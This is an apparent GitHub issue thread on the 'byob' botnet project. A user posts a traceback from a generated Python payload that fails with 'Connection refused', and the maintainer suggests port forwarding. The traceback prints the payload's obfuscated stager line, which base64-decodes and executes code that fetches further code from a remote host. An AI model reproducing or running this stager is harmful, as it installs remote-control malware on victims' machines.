### ISSUE TITLE
get an error when I run the python payload below the errors please help I am a slight noob

### ISSUE THREAD

**Issue by abdulgamer786** [malwaredllc/byob#374]
Traceback (most recent call last):
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/urllib/request.py", line 1350, in do_open
    h.request(req.get_method(), req.selector, req.data, headers,
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/http/client.py", line 1255, in request
    self._send_request(method, url, body, headers, encode_chunked)
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/http/client.py", line 1301, in _send_request
    self.endheaders(body, encode_chunked=encode_chunked)
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/http/client.py", line 1250, in endheaders
    self._send_output(message_body, encode_chunked=encode_chunked)
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/http/client.py", line 1010, in _send_output
    self.send(msg)
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/http/client.py", line 950, in send
    self.connect()
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/http/client.py", line 921, in connect
    self.sock = self._create_connection(
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/socket.py", line 808, in create_connection
    raise err
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/socket.py", line 796, in create_connection
    sock.connect(sa)
ConnectionRefusedError: [Errno 61] Connection refused

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/Users/muhsinhamzah/Downloads/byob_fR3.py", line 5, in <module>
    exec(eval(marshal.loads(zlib.decompress(base64.b64decode(b'eJwrtWZgYCgtyskvSM3TUM8oKSmw0tc3sdQzMjHVM7PQM7Q0sDI0NrbQ1y8uSUxPLSrWTwsy1iuoVNfUK0pNTNHQBAA+ChHz')))))
  File "<string>", line 1, in <module>
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/urllib/request.py", line 222, in urlopen
    return opener.open(url, data, timeout)
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/urllib/request.py", line 525, in open
    response = self._open(req, data)
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/urllib/request.py", line 542, in _open
    result = self._call_chain(self.handle_open, protocol, protocol +
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/urllib/request.py", line 502, in _call_chain
    result = func(*args)
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/urllib/request.py", line 1379, in http_open
    return self.do_open(http.client.HTTPConnection, req)
  File "/Users/muhsinhamzah/opt/anaconda3/lib/python3.8/urllib/request.py", line 1353, in do_open
    raise URLError(err)
urllib.error.URLError: <urlopen error [Errno 61] Connection refused>
(base) muhsinhamzah@Muhsins-Air ~ %

**Comment by malwaredllc** [comment]
Connection refused indicates your network setup is not configured properly, you probably need to do some port forwarding or something of that nature. Please go to the Discord support server if you need help with this (link on README).

**Comment by abdulgamer786** [comment]
umm but it is on my local network

**Comment by cyb3rspace** [comment]
Having the same issue and it still isn't fixed
